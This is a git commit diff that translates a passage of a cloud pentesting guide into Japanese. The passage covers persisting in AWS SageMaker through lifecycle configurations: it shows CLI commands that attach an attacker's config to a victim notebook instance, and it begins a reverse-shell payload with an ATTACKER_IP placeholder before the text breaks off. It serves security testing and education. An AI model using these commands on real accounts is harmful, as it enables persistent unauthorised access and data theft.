Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sagem

This commit is contained in:
Translator
2025-07-22 19:00:58 +00:00
parent 351d849fb5
commit ef22c232ab

View File

@@ -38,9 +38,9 @@ aws sagemaker update-notebook-instance \
--notebook-instance-name victim-instance \
--lifecycle-config-name attacker-lcc
```
## SageMaker Studioでライフサイクル設定を行う
## SageMaker Studioでライフサイクル構成を設定する
ライフサイクル設定は、SageMaker Studio内のさまざまなレベルおよび異なるアプリタイプに添付できます。
ライフサイクル構成は、SageMaker Studio内のさまざまなレベルおよび異なるアプリタイプに添付できます。
### スタジオドメインレベル(すべてのユーザー)
```bash
@@ -100,16 +100,16 @@ aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-app-type CodeEditor \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
```
### Critical Info:
### 重要な情報:
* ドメインまたはスペースレベルでLCCをアタッチすると、スコープ内のすべてのユーザーまたはアプリケーションに影響を与えます。
* より高い権限が必要ですsagemaker:UpdateDomain、sagemaker:UpdateSpace、通常はドメインレベルよりもスペースレベルで実現可能です。
* ネットワークレベルの制御(例:厳格な出口フィルタリング)は、成功したリバースシェルやデータの流出を防ぐことができます。
## Reverse Shell via Lifecycle Configuration
## ライフサイクル構成を介したリバースシェル
SageMaker Lifecycle Configurations (LCCs) execute custom scripts when notebook instances start. An attacker with permissions can establish a persistent reverse shell.
SageMakerライフサイクル構成LCCは、ートブックインスタンスが起動するときにカスタムスクリプトを実行します。権限を持つ攻撃者は、持続的なリバースシェルを確立できます。
### Payload Example:
### ペイロードの例:
```
#!/bin/bash
ATTACKER_IP="<ATTACKER_IP>"